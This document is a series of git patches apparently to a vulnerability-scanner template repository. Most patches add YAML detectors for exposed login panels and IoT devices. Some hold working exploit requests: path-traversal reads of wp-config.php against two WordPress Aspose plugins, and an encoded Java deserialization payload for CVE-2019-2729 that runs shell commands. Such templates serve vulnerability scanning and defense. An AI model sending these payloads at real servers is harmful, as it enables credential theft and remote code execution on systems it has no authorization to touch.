a/exposed-panels/cloudphysician-radar.yaml b/exposed-panels/cloudphysician-radar.yaml new file mode 100644 index 0000000000..78c1fcc81b --- /dev/null +++ b/exposed-panels/cloudphysician-radar.yaml @@ -0,0 +1,24 @@ +id: cloudphysician-radar + +info: + name: Cloudphysician RADAR + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7466 + tags: panel + metadata: + shodan: 'http.title:"Cloudphysician RADAR"' + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cloudphysician RADAR' + - type: status + status: + - 200 From 3400cfff5e6707b4030b022968e39971a53aa5dc Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 22 Oct 2021 08:41:10 +0900 Subject: [PATCH 3087/4083] Create aspose-importer-exporter-file-download.yaml --- aspose-importer-exporter-file-download.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 aspose-importer-exporter-file-download.yaml diff --git a/aspose-importer-exporter-file-download.yaml b/aspose-importer-exporter-file-download.yaml new file mode 100644 index 0000000000..0216e21bf1 --- /dev/null +++ b/aspose-importer-exporter-file-download.yaml @@ -0,0 +1,29 @@ +id: aspose-importer-exporter-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From e7a4c2654333b86e6f581b2ecc978dd3ce58e06e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 22 Oct 2021 08:42:43 +0900 Subject: [PATCH 3088/4083] Create aspose-pdf-file-download.yaml --- aspose-pdf-file-download.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 aspose-pdf-file-download.yaml diff --git a/aspose-pdf-file-download.yaml b/aspose-pdf-file-download.yaml new file mode 100644 index 0000000000..9989397a17 --- /dev/null +++ b/aspose-pdf-file-download.yaml @@ -0,0 +1,29 @@ +id: aspose-pdf-file-download + +info: + name: WordPress Aspose PDF Exporter File Download + author: 0x_Akoko + severity: high + description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131161 + - https://wordpress.org/plugins/aspose-pdf-exporter + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 8632760893d93602e4f8f94ae0db4473562cca74 Mon Sep 17 00:00:00 2001 From: Cristi Vlad Date: Fri, 22 Oct 2021 12:17:44 +0300 Subject: [PATCH 3089/4083] Created app.yaml Template --- misconfiguration/app-yaml.yaml | 38 ++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 misconfiguration/app-yaml.yaml diff --git a/misconfiguration/app-yaml.yaml b/misconfiguration/app-yaml.yaml new file mode 100644 index 0000000000..5f5760105d --- /dev/null +++ b/misconfiguration/app-yaml.yaml @@ -0,0 +1,38 @@ +id: app-yaml + +info: + name: app.yaml Finder + author: Cristi vlad (@cristivlad25) + severity: high + description: Finds app.yaml files which often contain sensitive information. + +requests: + - method: GET + path: + - "{{BaseURL}}/app.yaml" + - "{{BaseURL}}/app.yml" + - "{{BaseURL}}/application.yaml" + - "{{BaseURL}}/application.yml" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "runtime: " + condition: or + - type: status + status: + - 200 + - type: dsl + dsl: + - "!contains(tolower(body), '')" + - "!contains(tolower(body), '
    ')" + - "!contains(tolower(body), '
    ')" + condition: and + +file: + - extensions: + - yaml + - yml \ No newline at end of file From 41be58c63391ccb93299dee7ca4cd336c0f22453 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 15:09:15 +0530 Subject: [PATCH 3090/4083] misc update --- cves/2019/CVE-2019-2729.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index b28e4ae9bf..04e18b3fa1 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -18,14 +18,14 @@ requests: Host: {{Hostname}} Content-Type: text/xml - xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}9272-9102-EVC|revconnectionHandlertrue]]> + xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExececho${IFS}COP-9272-9102-EVC|revconnectionHandlertrue]]> matchers-condition: and matchers: - type: word words: - - "CVE-2019-2729" + - "CVE-2019-2729-POC" - type: status status: From ed4d1afd12840d4455c6aae1378c4208d6a3ad6b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Oct 2021 09:40:47 +0000 Subject: [PATCH 3091/4083] Auto Generated CVE annotations [Fri Oct 22 09:40:47 UTC 2021] :robot: --- cves/2021/CVE-2021-27561.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-27561.yaml b/cves/2021/CVE-2021-27561.yaml index ca860d8534..757ab2801b 100644 --- a/cves/2021/CVE-2021-27561.yaml +++ b/cves/2021/CVE-2021-27561.yaml @@ -7,6 +7,11 @@ info: description: A malicious actor can trigger Unauthenticated Remote Code Execution tags: cve,cve2021,rce,yealink reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27561 + cwe-id: CWE-77 requests: - method: GET From aa777694813979078f1171415cc18f57a05b0134 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Oct 2021 15:49:18 +0530 Subject: [PATCH 3092/4083] Rename aspose-pdf-file-download.yaml to vulnerabilities/wordpress/aspose-pdf-file-download.yaml --- .../wordpress/aspose-pdf-file-download.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename aspose-pdf-file-download.yaml => vulnerabilities/wordpress/aspose-pdf-file-download.yaml (100%) diff --git a/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml similarity index 100% rename from aspose-pdf-file-download.yaml rename to vulnerabilities/wordpress/aspose-pdf-file-download.yaml From 5118c00e248d0f042fcb6d1adc46c3f5a7b323cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Oct 2021 15:58:02 +0530 Subject: [PATCH 3093/4083] Update aspose-pdf-file-download.yaml --- vulnerabilities/wordpress/aspose-pdf-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 9989397a17..338fb37c0d 100644 --- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,aspose requests: - method: GET From 82ca4a8c4384c7e3d3264b433a1a64606f21feab Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Oct 2021 15:59:44 +0530 Subject: [PATCH 3094/4083] Update and rename aspose-file-download.yaml to aspose-ie-file-download.yaml --- .../wordpress/aspose-ie-file-download.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename aspose-importer-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-ie-file-download.yaml (90%) diff --git a/aspose-importer-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml similarity index 90% rename from aspose-importer-exporter-file-download.yaml rename to vulnerabilities/wordpress/aspose-ie-file-download.yaml index 0216e21bf1..095211f5e4 100644 --- a/aspose-importer-exporter-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -1,4 +1,4 @@ -id: aspose-importer-exporter-file-download +id: aspose-ie-file-download info: name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,aspose requests: - method: GET From e8333971fd5675f5699b274e0b30747f6700b317 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Oct 2021 16:06:36 +0530 Subject: [PATCH 3095/4083] Update microstrategy-detect.yaml --- technologies/microstrategy-detect.yaml | 41 +++++++++++++------------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/technologies/microstrategy-detect.yaml b/technologies/microstrategy-detect.yaml index def5c80c45..096647d1da 100644 --- a/technologies/microstrategy-detect.yaml +++ b/technologies/microstrategy-detect.yaml @@ -9,35 +9,16 @@ info: requests: - method: GET - + path: - "{{BaseURL}}/{{path}}" stop-at-first-match: true redirects: true max-redirects: 3 - - matchers: - - type: dsl - dsl: - - 'contains(body, "MicroStrategy, Incorporated.")' - - 'contains(body, "microstrategy.servletName")' - - 'contains(body, "mstrHiddenInput")' - extractors: - - type: regex - part: body - group: 1 - regex: - - 'ProductHelp/([0-9.A-Z]+)' - - type: regex - part: body - group: 1 - regex: - - 'WELCOME. MicroStrategy ([0-9]+)' payloads: path: - - - MicroStrategy/servlet/mstrWebAdmin/ - MicroStrategy/servlet/mstrWebAdmin - MicroStrategy/servlet/taskProc/ @@ -54,3 +35,23 @@ requests: - servlet/mstrWeb - asp/Main.aspx - MicroStrategy/asp + + matchers: + - type: dsl + dsl: + - 'contains(body, "MicroStrategy, Incorporated.")' + - 'contains(body, "microstrategy.servletName")' + - 'contains(body, "mstrHiddenInput")' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'ProductHelp/([0-9.A-Z]+)' + + - type: regex + part: body + group: 1 + regex: + - 'WELCOME. MicroStrategy ([0-9]+)' From 37db97f31245c1ca12ee89b4c34da6b1f0589f9b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Oct 2021 16:40:06 +0530 Subject: [PATCH 3096/4083] Update microstrategy-detect.yaml --- technologies/microstrategy-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/microstrategy-detect.yaml b/technologies/microstrategy-detect.yaml index 096647d1da..c432936b04 100644 --- a/technologies/microstrategy-detect.yaml +++ b/technologies/microstrategy-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil,Retr02332 severity: info description: Detect if MicroStrategy instances exist in your URLS - tags: microstrategy + tags: microstrategy,panel requests: - method: GET From 444fa88b2412fc5227ff0caa0370b446bc20cf7b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Oct 2021 22:15:57 +0530 Subject: [PATCH 3097/4083] Create jaeger-ui-dashboard.yaml --- misconfiguration/jaeger-ui-dashboard.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/jaeger-ui-dashboard.yaml diff --git a/misconfiguration/jaeger-ui-dashboard.yaml b/misconfiguration/jaeger-ui-dashboard.yaml new file mode 100644 index 0000000000..30b94cb5cc --- /dev/null +++ b/misconfiguration/jaeger-ui-dashboard.yaml @@ -0,0 +1,24 @@ +id: jaeger-ui-dashboard + +info: + name: Jaeger UI + author: dhiyaneshDK + severity: low + tags: misconfig + metadata: + shodan: 'http.title:"Jaeger UI"' + +requests: + - method: GET + path: + - "{{BaseURL}}/search" + + matchers-condition: and + matchers: + - type: word + words: + - 'Jaeger UI' + + - type: status + status: + - 200 From 8ef2737ef5f83e838d15423d414ca79d85ab91ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Oct 2021 22:18:54 +0530 Subject: [PATCH 3098/4083] Create routeros-login.yaml --- iot/routeros-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/routeros-login.yaml diff --git a/iot/routeros-login.yaml b/iot/routeros-login.yaml new file mode 100644 index 0000000000..809a65432a --- /dev/null +++ b/iot/routeros-login.yaml @@ -0,0 +1,24 @@ +id: routeros-login + +info: + name: RouterOS router configuration page login + author: dhiyaneshDK + severity: info + tags: panel + metadata: + shodan: 'http.title:"RouterOS router configuration page"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'RouterOS router configuration page' + + - type: status + status: + - 200 From 62dc0c0c316b3b6260a2710c249bc65c6e3c9a4c Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 22:19:12 +0530 Subject: [PATCH 3099/4083] misc update --- .../{app-yaml.yaml => application-yaml.yaml} | 28 +++++++++++-------- 1 file changed, 16 insertions(+), 12 deletions(-) rename misconfiguration/{app-yaml.yaml => application-yaml.yaml} (64%) diff --git a/misconfiguration/app-yaml.yaml b/misconfiguration/application-yaml.yaml similarity index 64% rename from misconfiguration/app-yaml.yaml rename to misconfiguration/application-yaml.yaml index 5f5760105d..f3f70248db 100644 --- a/misconfiguration/app-yaml.yaml +++ b/misconfiguration/application-yaml.yaml @@ -1,10 +1,10 @@ -id: app-yaml +id: application-yaml info: - name: app.yaml Finder + name: application.yaml detection author: Cristi vlad (@cristivlad25) - severity: high - description: Finds app.yaml files which often contain sensitive information. + severity: info + description: Finds Application YAML files which often contain sensitive information. requests: - method: GET @@ -13,26 +13,30 @@ requests: - "{{BaseURL}}/app.yml" - "{{BaseURL}}/application.yaml" - "{{BaseURL}}/application.yml" + stop-at-first-match: true matchers-condition: and matchers: - type: word - words: - - "runtime: " condition: or + words: + - "runtime:" + - "spring:" + - "datasource:" + - "platform:" + - "server:" + - "job:" + - type: status status: - 200 + - type: dsl + condition: or dsl: - "!contains(tolower(body), '')" - "!contains(tolower(body), '
    ')" - "!contains(tolower(body), '')" - condition: and - -file: - - extensions: - - yaml - - yml \ No newline at end of file + - "!contains(tolower(body), ' Date: Fri, 22 Oct 2021 22:23:55 +0530 Subject: [PATCH 3100/4083] Create honeywell-building-control.yaml --- iot/honeywell-building-control.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/honeywell-building-control.yaml diff --git a/iot/honeywell-building-control.yaml b/iot/honeywell-building-control.yaml new file mode 100644 index 0000000000..8692bf4946 --- /dev/null +++ b/iot/honeywell-building-control.yaml @@ -0,0 +1,24 @@ +id: honeywell-building-control + +info: + name: Honeywell Building Control + author: dhiyaneshDK + severity: info + tags: panel,iot + metadata: + shodan: 'html:"Honeywell Building Control"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Honeywell Building Control' + + - type: status + status: + - 200 From 99731d4fe84f44a7607815d07319d66550d907cf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Oct 2021 22:26:25 +0530 Subject: [PATCH 3101/4083] Create webtools-home.yaml --- iot/webtools-home.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/webtools-home.yaml diff --git a/iot/webtools-home.yaml b/iot/webtools-home.yaml new file mode 100644 index 0000000000..2567498576 --- /dev/null +++ b/iot/webtools-home.yaml @@ -0,0 +1,24 @@ +id: webtools-home + +info: + name: Webtools Home + author: dhiyaneshDK + severity: info + tags: iot + metadata: + shodan: 'http.title:"Webtools"' + +requests: + - method: GET + path: + - "{{BaseURL}}/wt2parser.cgi?home_en" + + matchers-condition: and + matchers: + - type: word + words: + - 'WebTools | Home' + + - type: status + status: + - 200 From e51cd588df3e1c32b6cc38bf22f85ea68c799847 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Oct 2021 22:28:41 +0530 Subject: [PATCH 3102/4083] Create grandstream-device-configuration.yaml --- iot/grandstream-device-configuration.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/grandstream-device-configuration.yaml diff --git a/iot/grandstream-device-configuration.yaml b/iot/grandstream-device-configuration.yaml new file mode 100644 index 0000000000..cda2b2900f --- /dev/null +++ b/iot/grandstream-device-configuration.yaml @@ -0,0 +1,24 @@ +id: grandstream-device-configuration + +info: + name: Grandstream Device Configuration + author: dhiyaneshDK + severity: info + tags: iot + metadata: + shodan: 'http.title:"Grandstream Device Configuration"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Grandstream Device Configuration' + + - type: status + status: + - 200 From 2cee284a1a5e681b71b645e0214e930aef37c159 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Oct 2021 22:31:30 +0530 Subject: [PATCH 3103/4083] Create huawei-home-gateway.yaml --- iot/huawei-home-gateway.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/huawei-home-gateway.yaml diff --git a/iot/huawei-home-gateway.yaml b/iot/huawei-home-gateway.yaml new file mode 100644 index 0000000000..f8e0545182 --- /dev/null +++ b/iot/huawei-home-gateway.yaml @@ -0,0 +1,24 @@ +id: huawei-home-gateway + +info: + name: HUAWEI Home Gateway HG658d + author: dhiyaneshDK + severity: info + tags: iot + metadata: + shodan: 'http.title:"HUAWEI Home Gateway HG658d"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'HUAWEI Home Gateway HG658d' + + - type: status + status: + - 200 From 2e2910b640895b39df80d79f16b272cf2b97bb09 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 22:45:06 +0530 Subject: [PATCH 3104/4083] misc updates --- technologies/microstrategy-detect.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/technologies/microstrategy-detect.yaml b/technologies/microstrategy-detect.yaml index c432936b04..e406938706 100644 --- a/technologies/microstrategy-detect.yaml +++ b/technologies/microstrategy-detect.yaml @@ -13,10 +13,6 @@ requests: path: - "{{BaseURL}}/{{path}}" - stop-at-first-match: true - redirects: true - max-redirects: 3 - payloads: path: - MicroStrategy/servlet/mstrWebAdmin/ @@ -36,8 +32,10 @@ requests: - asp/Main.aspx - MicroStrategy/asp + stop-at-first-match: true matchers: - type: dsl + condition: or dsl: - 'contains(body, "MicroStrategy, Incorporated.")' - 'contains(body, "microstrategy.servletName")' From c849b7d51acc5e61978183fd20600d8e8db1a142 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 22 Oct 2021 23:22:36 +0530 Subject: [PATCH 3105/4083] metadata update --- exposed-panels/alienvault-usm.yaml | 2 +- exposed-panels/cisco/cisco-ace-device-manager.yaml | 2 +- exposed-panels/cisco/cisco-edge-340.yaml | 2 +- exposed-panels/cisco/cisco-secure-cn.yaml | 2 +- exposed-panels/cisco/cisco-systems-login.yaml | 2 +- exposed-panels/cisco/cisco-telepresence.yaml | 2 +- exposed-panels/cloudphysician-radar.yaml | 2 +- exposed-panels/dericam-login.yaml | 2 +- exposed-panels/exsi-system.yaml | 2 +- exposed-panels/fireware-xtm-user-authentication.yaml | 2 +- exposed-panels/ibm-advanced-system-management.yaml | 2 +- exposed-panels/ibm-service-assistant.yaml | 2 +- exposed-panels/open-game-panel.yaml | 2 +- exposed-panels/project-insight-login.yaml | 2 +- exposed-panels/sql-monitor.yaml | 2 +- exposed-panels/squirrelmail-login.yaml | 2 +- exposed-panels/zimbra-web-client.yaml | 2 +- iot/codian-mcu-login.yaml | 2 +- iot/envision-gateway.yaml | 2 +- iot/grandstream-device-configuration.yaml | 2 +- iot/heatmiser-wifi-thermostat.yaml | 2 +- iot/honeywell-building-control.yaml | 2 +- iot/huawei-home-gateway.yaml | 2 +- iot/routeros-login.yaml | 2 +- iot/webcamxp-5.yaml | 2 +- iot/webtools-home.yaml | 2 +- misconfiguration/jaeger-ui-dashboard.yaml | 2 +- 27 files changed, 27 insertions(+), 27 deletions(-) diff --git a/exposed-panels/alienvault-usm.yaml b/exposed-panels/alienvault-usm.yaml index 